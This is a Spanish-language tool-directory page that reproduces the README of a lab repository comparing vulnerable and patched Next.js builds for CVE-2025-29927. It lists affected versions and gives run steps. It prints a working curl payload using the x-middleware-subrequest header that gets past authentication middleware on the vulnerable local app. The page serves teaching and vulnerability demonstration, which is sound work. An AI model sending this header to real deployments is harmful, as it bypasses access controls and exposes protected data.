Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nextjs-cve-2025-29927 — vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
Herramientas/GitHubGitHub/yeondg/nextjs-cve-2025-29927
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubyeondg/nextjs-cve-2025-29927

nextjs-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de middleware Next.js CVE-2025-29927

Este repositorio es un proyecto monorepo que permite comparar la vulnerabilidad de middleware CVE-2025-29927 utilizando las versiones Next.js 15.2.3 y Next.js 15.1.7.

Descripción de la vulnerabilidad

CVE-2025-29927 es una vulnerabilidad de seguridad descubierta en el middleware de Next.js que permite eludir el middleware de autenticación mediante el encabezado x-middleware-subrequest. Esta vulnerabilidad afecta a las siguientes versiones:

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9 Estas versiones se resolvieron actualizando cada una a su versión de parche correspondiente.

Cómo ejecutar

  1. Clona el repositorio.
  2. Instala las dependencias: pnpm install
  3. Ejecuta el servidor de desarrollo: pnpm dev
  4. Accede a cada aplicación
  • Versión parcheada (15.2.3): http://localhost:3000
  • Versión vulnerable (15.1.7): http://localhost:3001
  1. Si accedes al endpoint /api/protected sin token, se deniega el acceso.
root@kitploit:~
$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}

$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
  1. Si se proporciona un token válido, se puede acceder correctamente al endpoint protegido.
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}

$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
  1. Omite el middleware aprovechando la vulnerabilidad.
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}

Estructura del proyecto

root@kitploit:~
nextjs-cve-2025-29927/
├── apps/
│   ├── next15_1_7/  # 취약한 버전
│   └── next15_2_3/  # 패치된 버전
├── packages/
│   └── ui/          # 공유 UI 컴포넌트
└── README.md

Enlaces de referencia

  • Blog de Vercel
  • YouTube de DevStefanCho
  • https://hackyboiz.github.io/2025/03/27/bekim/2025-03-27/
  • https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
  • https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
  • https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927
Descargar herramienta